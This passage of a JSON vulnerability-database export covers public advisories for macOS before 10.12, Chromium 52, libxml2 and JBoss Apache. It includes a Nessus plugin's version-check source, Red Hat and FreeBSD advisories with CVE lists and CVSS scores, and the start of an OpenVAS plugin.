"type": "nessus", "title": "macOS < 10.12 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0755", "CVE-2016-4617", "CVE-2016-4658", "CVE-2016-4682", "CVE-2016-4694", "CVE-2016-4696", "CVE-2016-4697", "CVE-2016-4698", "CVE-2016-4699", "CVE-2016-4700", "CVE-2016-4701", "CVE-2016-4702", "CVE-2016-4703", "CVE-2016-4706", "CVE-2016-4707", "CVE-2016-4708", "CVE-2016-4709", "CVE-2016-4710", "CVE-2016-4711", "CVE-2016-4712", "CVE-2016-4713", "CVE-2016-4715", "CVE-2016-4716", "CVE-2016-4717", "CVE-2016-4718", "CVE-2016-4722", "CVE-2016-4723", "CVE-2016-4724", "CVE-2016-4725", "CVE-2016-4726", "CVE-2016-4727", "CVE-2016-4736", "CVE-2016-4738", "CVE-2016-4739", "CVE-2016-4742", "CVE-2016-4745", "CVE-2016-4748", "CVE-2016-4750", "CVE-2016-4752", "CVE-2016-4753", "CVE-2016-4755", "CVE-2016-4771", "CVE-2016-4772", "CVE-2016-4773", "CVE-2016-4774", "CVE-2016-4775", "CVE-2016-4776", "CVE-2016-4777", "CVE-2016-4778", "CVE-2016-4779", "CVE-2016-5131", "CVE-2016-5768", "CVE-2016-5769", "CVE-2016-5770", "CVE-2016-5771", "CVE-2016-5772", "CVE-2016-5773", "CVE-2016-6174", 
"CVE-2016-6288", "CVE-2016-6289", "CVE-2016-6290", "CVE-2016-6291", "CVE-2016-6292", "CVE-2016-6294", "CVE-2016-6295", "CVE-2016-6296", "CVE-2016-6297", "CVE-2016-7580", "CVE-2016-7582"], "modified": "2019-06-19T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOS_10_12.NASL", "href": "https://www.tenable.com/plugins/nessus/93685", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93685);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/06/19 15:17:43\");\n\n script_cve_id(\n \"CVE-2016-0755\",\n \"CVE-2016-4617\",\n \"CVE-2016-4658\",\n \"CVE-2016-4682\",\n \"CVE-2016-4694\",\n \"CVE-2016-4696\",\n \"CVE-2016-4697\",\n \"CVE-2016-4698\",\n \"CVE-2016-4699\",\n \"CVE-2016-4700\",\n \"CVE-2016-4701\",\n \"CVE-2016-4702\",\n \"CVE-2016-4703\",\n \"CVE-2016-4706\",\n \"CVE-2016-4707\",\n \"CVE-2016-4708\",\n \"CVE-2016-4709\",\n \"CVE-2016-4710\",\n \"CVE-2016-4711\",\n \"CVE-2016-4712\",\n \"CVE-2016-4713\",\n \"CVE-2016-4715\",\n \"CVE-2016-4716\",\n \"CVE-2016-4717\",\n \"CVE-2016-4718\",\n \"CVE-2016-4722\",\n \"CVE-2016-4723\",\n \"CVE-2016-4724\",\n \"CVE-2016-4725\",\n \"CVE-2016-4726\",\n \"CVE-2016-4727\",\n \"CVE-2016-4736\",\n \"CVE-2016-4738\",\n \"CVE-2016-4739\",\n \"CVE-2016-4742\",\n \"CVE-2016-4745\",\n \"CVE-2016-4748\",\n \"CVE-2016-4750\",\n \"CVE-2016-4752\",\n \"CVE-2016-4753\",\n \"CVE-2016-4755\",\n \"CVE-2016-4771\",\n \"CVE-2016-4772\",\n \"CVE-2016-4773\",\n \"CVE-2016-4774\",\n \"CVE-2016-4775\",\n \"CVE-2016-4776\",\n \"CVE-2016-4777\",\n \"CVE-2016-4778\",\n \"CVE-2016-4779\",\n \"CVE-2016-5131\",\n \"CVE-2016-5768\",\n \"CVE-2016-5769\",\n \"CVE-2016-5770\",\n \"CVE-2016-5771\",\n \"CVE-2016-5772\",\n \"CVE-2016-5773\",\n \"CVE-2016-6174\",\n \"CVE-2016-6288\",\n \"CVE-2016-6289\",\n \"CVE-2016-6290\",\n \"CVE-2016-6291\",\n \"CVE-2016-6292\",\n \"CVE-2016-6294\",\n \"CVE-2016-6295\",\n \"CVE-2016-6296\",\n \"CVE-2016-6297\",\n 
\"CVE-2016-7580\",\n \"CVE-2016-7582\"\n );\n script_bugtraq_id(\n 82307,\n 91396,\n 91397,\n 91398,\n 91399,\n 91401,\n 91403,\n 91732,\n 92053,\n 92073,\n 92074,\n 92078,\n 92094,\n 92095,\n 92097,\n 92099,\n 92111,\n 92115,\n 93054,\n 93055,\n 93056,\n 93059,\n 93060,\n 93063,\n 93852,\n 94434,\n 94435,\n 96329\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2016-09-20\");\n\n script_name(english:\"macOS < 10.12 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Mac OS X / macOS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS update that fixes multiple security\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X that is prior to\n10.10.5, 10.11.x prior to 10.11.6, or is not macOS 10.12. It is,\ntherefore, affected by multiple vulnerabilities in the following\ncomponents :\n\n - apache\n - apache_mod_php\n - Apple HSSPI Support\n - AppleEFIRuntime\n - AppleMobileFileIntegrity\n - AppleUCC\n - Application Firewall\n - ATS\n - Audio\n - Bluetooth\n - cd9660\n - CFNetwork\n - CommonCrypto\n - CoreCrypto\n - CoreDisplay\n - curl\n - Date & Time Pref Pane\n - DiskArbitration\n - File Bookmark\n - FontParser\n - IDS - Connectivity\n - ImageIO\n - Intel Graphics Driver\n - IOAcceleratorFamily\n - IOThunderboltFamily\n - Kerberos v5 PAM module\n - Kernel\n - libarchive\n - libxml2\n - libxpc\n - libxslt\n - mDNSResponder\n - NSSecureTextField\n - Perl\n - S2 Camera\n - Security\n - Terminal\n - WindowServer\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207170\");\n # https://lists.apple.com/archives/security-announce/2016/Sep/msg00006.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c49c769b\");\n 
script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS version 10.12 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4658\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"IPS Community Suite RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70) exit(1, \"Can't determine the host's OS with sufficient confidence.\");\n}\nif (!os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\nmatches = pregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif (isnull(matches)) exit(1, \"Failed to parse the macOS / Mac OS X version ('\" + os + \"').\");\n\nversion = matches[1];\nfixed_version = \"10.12\";\n\n# Patches exist for OS X Yosemite v10.10.5 and OS X El Capitan v10.11.6\n# https://support.apple.com/en-us/HT207275\n# Do NOT mark them as vuln\nif (\n # No 10.x patch below 10.10.5\n ver_compare(ver:version, fix:'10.10.5', strict:FALSE) == -1\n ||\n # No 10.11.x patch below 10.11.6\n (\n version =~\"^10\\.11($|[^0-9])\"\n &&\n ver_compare(ver:version, fix:'10.11.6', strict:FALSE) == -1\n )\n)\n{\n security_report_v4(\n port:0,\n severity:SECURITY_HOLE,\n extra:\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n'\n );\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"macOS / Mac OS X\", version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:28:21", "description": "The remote host is running a version of Mac OS X version 10.x prior to 10.12, and is affected by multiple vulnerabilities in the following components :\n\n - apache (CVE-2016-4694)\n - apache_mod_php (CVE-2016-5768, CVE-2016-5769, CVE-2016-5770, CVE-2016-5771, CVE-2016-5772, CVE-2016-5773, CVE-2016-6174, CVE-2016-6288, CVE-2016-6289, CVE-2016-6290, CVE-2016-6291, CVE-2016-6292, CVE-2016-6294, 
CVE-2016-6295, CVE-2016-6296, CVE-2016-6297)\n - Apple HSSPI Support (CVE-2016-4697)\n - AppleEFIRuntime (CVE-2016-4696)\n - AppleMobileFileIntegrity (CVE-2016-4698)\n - AppleUUC (CVE-2016-4699, CVE-2016-4700)\n - Application Firewall (CVE-2016-4701)\n - ATS (CVE-2016-4779)\n - Audio (CVE-2016-4702)\n - Bluetooth (CVE-2016-4703)\n - cd9660 (CVE-2016-4706)\n - CFNetwork (CVE-2016-4707, CVE-2016-4708)\n - CommonCrypto (CVE-2016-4711)\n - CoreCrypto (CVE-2016-4712)\n - CoreDisplay (CVE-2016-4713)\n - curl (CVE-2016-0755, CVE-2016-4606)\n - Date & Time Pref Pane (CVE-2016-4715)\n - DiskArbitration (CVE-2016-4716)\n - File Bookmark (CVE-2016-4717)\n - FontParser (CVE-2016-4718)\n - IDS - Connectivity (CVE-2016-4722)\n - Intel Graphics Driver (CVE-2016-4723, CVE-2016-7582)\n - IOAcceleratorFamily (CVE-2016-4724, CVE-2016-4725, CVE-2016-4726)\n - IOThunderboltFamily (CVE-2016-4727)\n - Kerberos v5 PAM module (CVE-2016-4745)\n - Kernel (CVE-2016-4771, CVE-2016-4772, CVE-2016-4773, CVE-2016-4774, CVE-2016-4775, CVE-2016-4776, CVE-2016-4777, CVE-2016-4778)\n - lib archive (CVE-2016-4736)\n - libxml2 (CVE-2016-4658, CVE-2016-5131)\n - libxpc (CVE-2016-4617)\n - libxslt (CVE-2016-4738)\n - mDNSResponder (CVE-2016-4739)\n - NSSecureTextField (CVE-2016-4742)\n - Perl (CVE-2016-4748, CVE-2016-4750)\n - Security (CVE-2016-4752, CVE-2016-4753)\n - Terminal (CVE-2016-4755)\n - WindowServer (CVE-2016-4709, CVE-2016-4710)", "cvss3": {}, "published": "2016-10-21T00:00:00", "type": "nessus", "title": "Mac OS X 10.x < 10.12 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0755", "CVE-2016-4606", "CVE-2016-4617", "CVE-2016-4658", "CVE-2016-4694", "CVE-2016-4696", "CVE-2016-4697", "CVE-2016-4698", "CVE-2016-4699", "CVE-2016-4700", "CVE-2016-4701", "CVE-2016-4702", "CVE-2016-4703", "CVE-2016-4706", "CVE-2016-4707", "CVE-2016-4708", "CVE-2016-4709", "CVE-2016-4710", "CVE-2016-4711", "CVE-2016-4712", "CVE-2016-4713", "CVE-2016-4715", "CVE-2016-4716", 
"CVE-2016-4717", "CVE-2016-4718", "CVE-2016-4722", "CVE-2016-4723", "CVE-2016-4724", "CVE-2016-4725", "CVE-2016-4726", "CVE-2016-4727", "CVE-2016-4736", "CVE-2016-4738", "CVE-2016-4739", "CVE-2016-4742", "CVE-2016-4745", "CVE-2016-4748", "CVE-2016-4750", "CVE-2016-4752", "CVE-2016-4753", "CVE-2016-4755", "CVE-2016-4771", "CVE-2016-4772", "CVE-2016-4773", "CVE-2016-4774", "CVE-2016-4775", "CVE-2016-4776", "CVE-2016-4777", "CVE-2016-4778", "CVE-2016-4779", "CVE-2016-5131", "CVE-2016-5768", "CVE-2016-5769", "CVE-2016-5770", "CVE-2016-5771", "CVE-2016-5772", "CVE-2016-5773", "CVE-2016-6174", "CVE-2016-6288", "CVE-2016-6289", "CVE-2016-6290", "CVE-2016-6291", "CVE-2016-6292", "CVE-2016-6294", "CVE-2016-6295", "CVE-2016-6296", "CVE-2016-6297", "CVE-2016-7582"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "9620.PRM", "href": "https://www.tenable.com/plugins/nnm/9620", "sourceData": "Binary data 9620.prm", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhat": [{"lastseen": "2023-05-25T14:36:41", "description": "Chromium is an open-source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 52.0.2743.82.\n\nSecurity Fix(es):\n\n* Multiple flaws were found in the processing of malformed web content. A web page containing malicious content could cause Chromium to crash, execute arbitrary code, or disclose sensitive information when visited by the victim. 
(CVE-2016-1706, CVE-2016-1708, CVE-2016-1709, CVE-2016-1710, CVE-2016-1711, CVE-2016-5127, CVE-2016-5128, CVE-2016-5129, CVE-2016-5130, CVE-2016-5131, CVE-2016-5132, CVE-2016-5133, CVE-2016-5134, CVE-2016-5135, CVE-2016-5136, CVE-2016-5137, CVE-2016-1705)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2016-07-26T05:05:36", "type": "redhat", "title": "(RHSA-2016:1485) Important: chromium-browser security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2018-06-07T05:04:10", "id": "RHSA-2016:1485", "href": "https://access.redhat.com/errata/RHSA-2016:1485", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-03T15:19:47", "description": "The libxml2 library is a development toolbox providing the implementation of various XML standards.\n\nSecurity Fix(es):\n\n* libxml2: Use after 
free triggered by XPointer paths beginning with range-to (CVE-2016-5131)\n\n* libxml2: Use after free in xmlXPathCompOpEvalPositionalPredicate() function in xpath.c (CVE-2017-15412)\n\n* libxml2: DoS caused by incorrect error detection during XZ decompression (CVE-2015-8035)\n\n* libxml2: NULL pointer dereference in xmlXPathCompOpEval() function in xpath.c (CVE-2018-14404)\n\n* libxml2: Unrestricted memory usage in xz_head() function in xzlib.c (CVE-2017-18258)\n\n* libxml2: Infinite loop caused by incorrect error detection during LZMA decompression (CVE-2018-14567)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.8 Release Notes linked from the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-31T09:30:25", "type": "redhat", "title": "(RHSA-2020:1190) Moderate: libxml2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2015-8035", "CVE-2016-5131", "CVE-2017-15412", "CVE-2017-18258", "CVE-2018-14404", "CVE-2018-14567"], "modified": "2020-03-31T10:09:57", "id": "RHSA-2020:1190", "href": "https://access.redhat.com/errata/RHSA-2020:1190", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T22:21:58", "description": "This release adds the new Apache HTTP Server 2.4.29 packages that are part\nof the JBoss Core Services offering.\n\nThis release serves as a replacement for Red Hat JBoss Core Services\nApache HTTP Server 2.4.23, and includes bug fixes and enhancements. Refer\nto the Release Notes for information on the most significant bug fixes,\nenhancements and component upgrades included in this release.\n\nSecurity Fix(es):\n\n* expat: Out-of-bounds heap read on crafted input causing crash (CVE-2016-0718)\n* curl: escape and unescape integer overflows (CVE-2016-7167)\n* curl: Cookie injection for other servers (CVE-2016-8615)\n* curl: Case insensitive password comparison (CVE-2016-8616)\n* curl: Out-of-bounds write via unchecked multiplication (CVE-2016-8617)\n* curl: Double-free in curl_maprintf (CVE-2016-8618)\n* curl: Double-free in krb5 code (CVE-2016-8619)\n* curl: curl_getdate out-of-bounds read (CVE-2016-8621)\n* curl: URL unescape heap overflow via integer truncation (CVE-2016-8622)\n* curl: Use-after-free via shared cookies (CVE-2016-8623)\n* curl: Invalid URL parsing with '#' (CVE-2016-8624)\n* curl: IDNA 2003 makes curl use wrong host (CVE-2016-8625)\n* libxml2: out-of-bounds read (unfixed CVE-2016-4483 in JBCS) (CVE-2016-9598)\n* pcre: Out-of-bounds read in compile_bracket_matchingpath function (8.41/3) (CVE-2017-6004)\n* pcre: Invalid Unicode property lookup (8.41/7, 10.24/2) (CVE-2017-7186)\n* pcre: invalid memory read in_pcre32_xclass (pcre_xclass.c) (CVE-2017-7244)\n* pcre: stack-based buffer overflow write in pcre32_copy_substring (CVE-2017-7245)\n* pcre: stack-based buffer overflow write in 
pcre32_copy_substring (CVE-2017-7246)\n* curl: FTP PWD response parser out of bounds read (CVE-2017-1000254)\n* curl: IMAP FETCH response out of bounds read (CVE-2017-1000257)\n* curl: Heap-based buffer overflow in Curl_smtp_escape_eob() when uploading data over SMTP (CVE-2018-0500)\n\nDetails around this issue, including information about the CVE, severity of\nthe issue, and the CVSS score can be found on the CVE page listed in the\nReference section below.\n\nThe following packages have been upgraded to a newer upstream version:\n* Curl (7.57.0)\n* OpenSSL (1.0.2n)\n* Expat (2.2.5)\n* PCRE (8.41)\n* libxml2 (2.9.7)\n\nAcknowledgements:\n\nCVE-2017-1000254: Red Hat would like to thank Daniel Stenberg for reporting this issue.\nUpstream acknowledges Max Dymond as the original reporter.\nCVE-2017-1000257: Red Hat would like to thank the Curl project for reporting this issue. Upstream acknowledges Brian Carpenter, (the OSS-Fuzz project) as the original reporter.\nCVE-2018-0500: Red Hat would like to thank the Curl project for reporting this issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-16T16:05:21", "type": "redhat", "title": "(RHSA-2018:2486) Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.29 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0718", "CVE-2016-4483", "CVE-2016-4975", "CVE-2016-5131", "CVE-2016-7167", "CVE-2016-8615", "CVE-2016-8616", "CVE-2016-8617", "CVE-2016-8618", "CVE-2016-8619", "CVE-2016-8621", "CVE-2016-8622", "CVE-2016-8623", "CVE-2016-8624", "CVE-2016-8625", "CVE-2016-9318", "CVE-2016-9596", "CVE-2016-9597", "CVE-2016-9598", "CVE-2017-1000254", "CVE-2017-1000257", "CVE-2017-18258", "CVE-2017-6004", "CVE-2017-7186", "CVE-2017-7244", "CVE-2017-7245", "CVE-2017-7246", "CVE-2017-9047", "CVE-2017-9048", "CVE-2017-9049", "CVE-2017-9050", "CVE-2018-0500"], "modified": "2018-09-05T05:26:14", "id": "RHSA-2018:2486", "href": "https://access.redhat.com/errata/RHSA-2018:2486", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2023-06-03T15:04:39", "description": "\n\nGoogle Chrome Releases reports:\n\n48 security fixes in this release, including:\n\n[610600] High CVE-2016-1706: Sandbox escape in PPAPI. Credit to\n\t Pinkie Pie xisigr of Tencent's Xuanwu Lab\n[613949] High CVE-2016-1708: Use-after-free in Extensions.\n\t Credit to Adam Varsan\n[614934] High CVE-2016-1709: Heap-buffer-overflow in sfntly.\n\t Credit to ChenQin of Topsec Security Team\n[616907] High CVE-2016-1710: Same-origin bypass in Blink.\n\t Credit to Mariusz Mlynski\n[617495] High CVE-2016-1711: Same-origin bypass in Blink.\n\t Credit to Mariusz Mlynski\n[618237] High CVE-2016-5127: Use-after-free in Blink. Credit\n\t to cloudfuzzer\n[619166] High CVE-2016-5128: Same-origin bypass in V8. Credit\n\t to Anonymous\n[620553] High CVE-2016-5129: Memory corruption in V8. Credit to\n\t Jeonghoon Shin\n[623319] High CVE-2016-5130: URL spoofing. Credit to Wadih\n\t Matar\n[623378] High CVE-2016-5131: Use-after-free in libxml. 
Credit\n\t to Nick Wellnhofer\n[607543] Medium CVE-2016-5132: Limited same-origin bypass in\n\t Service Workers. Credit to Ben Kelly\n[613626] Medium CVE-2016-5133: Origin confusion in proxy\n\t authentication. Credit to Patch Eudor\n[593759] Medium CVE-2016-5134: URL leakage via PAC script.\n\t Credit to Paul Stone\n[605451] Medium CVE-2016-5135: Content-Security-Policy bypass.\n\t Credit to kingxwy\n[625393] Medium CVE-2016-5136: Use after free in extensions.\n\t Credit to Rob Wu\n[625945] Medium CVE-2016-5137: History sniffing with HSTS and\n\t CSP. Credit to Xiaoyin Liu\n[629852] CVE-2016-1705: Various fixes from internal audits,\n\t fuzzing and other initiatives.\n\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2016-07-20T00:00:00", "type": "freebsd", "title": "chromium -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", 
"CVE-2016-5136", "CVE-2016-5137"], "modified": "2016-07-20T00:00:00", "id": "6FAE9FE1-5048-11E6-8AA7-3065EC8FD3EC", "href": "https://vuxml.freebsd.org/freebsd/6fae9fe1-5048-11e6-8aa7-3065ec8fd3ec.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-01-31T18:36:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-08-04T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for Chromium (openSUSE-SU-2016:1918-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5129", "CVE-2016-1709", "CVE-2016-1706", "CVE-2016-1708", "CVE-2016-5134", "CVE-2016-5130", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5133", "CVE-2016-5131", "CVE-2016-1705", "CVE-2016-5135", "CVE-2016-1707", "CVE-2016-5136", "CVE-2016-5128", "CVE-2016-5132", "CVE-2016-5137", "CVE-2016-5127"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851374", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851374", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851374\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-08-04 16:27:28 +0530 (Thu, 04 Aug 2016)\");\n script_cve_id(\"CVE-2016-1705\", \"CVE-2016-1706\", \"CVE-2016-1707\", \"CVE-2016-1708\",\n \"CVE-2016-1709\", \"CVE-2016-1710\", \"CVE-2016-1711\", \"CVE-2016-5127\",\n \"CVE-2016-5128\", \"CVE-2016-5129\", \"CVE-2016-5130\", \"CVE-2016-5131\",\n \"CVE-2016-5132\", \"CVE-2016-5133\", \"CVE-2016-5134\", \"CVE-2016-5135\",\n \"CVE-2016-5136\", \"CVE-2016-5137\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for Chromium (openSUSE-SU-2016:1918-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Chromium'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Chromium was updated to 52.0.2743.82 to fix the following security issues\n (boo#989901):\n\n - CVE-2016-1706: Sandbox escape in PPAPI\n\n - CVE-2016-1707: URL spoofing on iOS\n\n - CVE-2016-1708: Use-after-free in Extensions\n\n - 